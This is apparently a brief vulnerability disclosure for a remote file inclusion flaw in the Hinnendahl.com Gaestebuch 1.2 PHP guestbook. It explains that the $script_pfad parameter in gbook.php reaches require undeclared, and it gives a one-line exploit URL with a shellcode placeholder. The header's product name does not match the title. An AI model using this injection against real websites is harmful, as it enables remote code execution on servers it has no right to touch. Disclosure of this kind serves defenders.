Hinnendahl.com Gaestebuch 1.2 Remote File Inclusion

` ########################################################  
# #  
# HINNENDAHL.COM Gaestebuch 1.2 #  
# #  
# Remote File Inclusion Vulnerability #  
# #  
# by bd0rk || SOH-Crew #  
# #  
# www.soh-crew.it.tt #  
# #  
# Contact: bd0rk[at]hackermail.com #  
# #  
########################################################  
  
  
[~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1  
  
[~] Vendor: http://www.hinnendahl.com/  
  
[~] Download: http://www.hinnendahl.com/index.php?seite=download  
  
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s  
  
  
Description: The $script_pfad parameter in /guestbook/gbook.php  
isn't declared before require. So an attacker can execute some  
php-shellcode about it. (line 3 - 4)  
  
  
  
[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]  
  
  
  
### The 21 years old, german Hacker bd0rk ### <---white-hat :-)  
  
`